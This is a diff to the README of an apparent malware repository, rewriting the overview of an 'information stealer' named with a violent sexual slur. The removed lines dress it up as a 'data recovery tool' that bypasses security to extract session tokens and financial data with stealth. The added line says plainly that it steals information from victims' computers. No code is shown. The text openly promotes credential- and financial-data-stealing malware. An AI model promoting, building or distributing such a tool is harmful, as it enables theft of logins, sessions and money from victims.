badhappens/Rape-01/README.md

 ## ⚡ Overview

-**Rape Stealer** is a brutal and efficient data recovery tool designed for deep system exploitation.
-It bypasses security layers to extract sensitive information, session tokens, and financial data with maximum stealth and speed.
+**Rape Stealer** is a advanced information stealer from victim computer.

 ---